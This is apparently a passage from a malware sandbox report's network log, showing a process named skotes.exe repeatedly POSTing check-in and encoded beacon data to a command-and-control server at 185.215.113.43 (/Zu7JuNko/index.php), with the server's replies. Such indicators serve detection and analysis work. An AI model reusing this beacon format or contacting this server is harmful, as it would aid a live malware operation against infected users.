Nov 13, 2024 20:44:12.552083015 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	50340	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:14.192596912 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:44:15.093530893 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	50343	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:16.623876095 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:44:17.561366081 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	50345	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:19.187158108 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:44:20.126209021 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	50346	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:21.647500992 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:44:22.558702946 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	50347	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:24.210546017 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:44:25.117480993 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	50351	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:26.648921013 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:44:27.556406975 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	50353	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:29.392005920 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:44:30.315830946 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	50355	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:31.840562105 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:44:32.763936996 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	50356	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:34.396970987 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:44:35.305160999 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	50358	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:36.823913097 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:44:37.731404066 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	50360	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:39.371359110 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:44:40.320143938 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	50362	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:41.837594986 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:44:42.758766890 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	50367	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:44.412170887 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:44:45.368928909 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	50369	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:46.900002003 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:44:47.846314907 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	50371	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:49.475902081 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:44:50.394752026 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	50373	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:51.911514997 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:44:52.840157032 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	50376	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:54.465075970 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:44:55.394751072 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	50378	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:56.916265965 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:44:57.889867067 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	50382	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:59.524127960 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:45:00.442178011 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	50383	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:45:01.954215050 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:45:02.908425093 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	50386	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:45:04.531137943 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:45:05.446535110 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	50387	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:45:06.959917068 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:45:08.345773935 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 13, 2024 20:45:08.346518040 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 13, 2024 20:45:08.346549034 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	50390	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:45:09.964160919 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
